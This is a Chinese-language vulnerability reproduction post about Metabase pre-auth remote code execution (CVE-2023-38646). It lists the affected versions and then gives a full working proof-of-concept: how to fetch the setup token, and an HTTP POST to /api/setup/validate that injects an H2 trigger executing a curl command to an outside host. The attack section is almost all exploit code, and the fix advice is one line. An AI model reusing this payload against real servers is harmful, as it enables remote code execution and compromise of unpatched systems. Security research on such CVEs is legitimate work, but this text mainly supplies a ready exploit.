【漏洞复现】Metabase 代码执行漏洞(CVE-2023-38646)

admin 2023年10月19日17:26:25评论68 views字数 1307阅读4分21秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

Metabase是一个开源的商业智能平台。你可以使用Metabase探索你的数据,或者将Metabase嵌入你的应用程序中,让你的客户自己探索他们的数据。


官网:
https://www.metabase.com/

漏洞编号:
CVE-2023-38646

影响范围:
Metabase Enterprise < 1.46.6.1
Metabase Enterprise < 1.45.4.1
Metabase Enterprise < 1.44.7.1
Metabase Enterprise < 1.43.7.2
Metabase open source < 0.46.6.1
Metabase open source < 0.45.4.1
Metabase open source < 0.44.7.1
Metabase open source < 0.43.7.2


复现环境:

Metabase open source 0.46.5

0X02 漏洞复现
获取tokenhttp://192.168.245.134:3000/api/session/properties
【漏洞复现】Metabase 代码执行漏洞(CVE-2023-38646)

POC:

POST /api/setup/validate HTTP/1.1Host: 192.168.245.134:3000Content-Type: application/jsonContent-Length: 749
{ "token": "dc4efa5c-831f-4c2c-87d3-971072537ab0", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "refingerprint": false, "auto_run_queries": true, "schedules": {}, "details": { "db": "zip:./Desktop/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnjava.lang.Runtime.getRuntime().exec('curl http://192.168.245.129:9999')n$$--=x", "advanced-options": false, "ssl": true }, "name": "test1", "engine": "h2" }}
【漏洞复现】Metabase 代码执行漏洞(CVE-2023-38646)

测试环境metabase.jar放在桌面,CMD路径在C:Userstest,需拼接一个Desktop目录,这里可以去拼接路径,也可以写绝对路径。

【漏洞复现】Metabase 代码执行漏洞(CVE-2023-38646)
【漏洞复现】Metabase 代码执行漏洞(CVE-2023-38646)


0X03 修复建议

更新至最新版!

0X04 写在最后

回复“加群”,获取群号。

侵删!

原文始发于微信公众号(皓月的笔记本):【漏洞复现】Metabase 代码执行漏洞(CVE-2023-38646)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月19日17:26:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】Metabase 代码执行漏洞(CVE-2023-38646)http://cn-sec.com/archives/2125378.html

发表评论

匿名网友 填写信息